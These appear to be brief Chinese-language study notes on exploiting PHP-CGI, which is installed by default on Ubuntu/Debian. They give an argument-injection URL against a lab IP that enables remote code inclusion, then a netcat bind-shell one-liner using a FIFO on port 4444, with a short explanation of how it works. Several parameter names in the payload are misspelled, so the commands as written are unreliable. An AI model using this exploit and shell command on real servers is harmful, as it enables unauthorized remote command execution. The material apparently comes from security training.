2 默认安装-Ubuntu/Debian默认安装cgi模块(在php代码里面使用cgi就可以直接执行系统命令 方便程序员操作)
php存在另一个目录 不再网页主目录 爬网爬不出
Ubuntu/Debian默认安装PHP5-cgi
可直接访问/cgi-bin/php5和/cgi-bin/php(爬不出的目录)
http://192.168.56.101/cgi-bin/php?-d+allow_url_inlcude=on+-d+ disable_funtions="" -d open_basedir=none -d auto_prepend_file=dphp://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
让服务器主动打开端口 去侦听 然后拿shell
mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
mk一个fifo(放在/tmp/pipe)进行管道到/tmp/pipe 又sh /tmp/pipe